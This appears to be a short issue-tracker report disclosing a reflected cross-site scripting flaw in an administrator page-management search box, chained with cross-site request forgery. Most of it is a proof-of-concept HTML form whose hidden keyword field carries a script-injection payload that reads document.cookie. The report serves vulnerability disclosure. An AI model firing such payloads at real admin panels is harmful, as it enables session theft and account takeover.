Open
Description
Reflective XSS exists in the administrator's page management office
In the search box, enter "><a src=" to trigger XSS
Reuse CSRF vulnerability to obtain cookies
POC
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/index.php?g=&m=admin_page&a=index" method="POST">
<input type="hidden" name="start_time" value="" />
<input type="hidden" name="end_time" value="" />
<input type="hidden" name="keyword" value=""><svg onload=alert(document.cookie)><a src="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Metadata
Metadata
Assignees
Labels
No labels




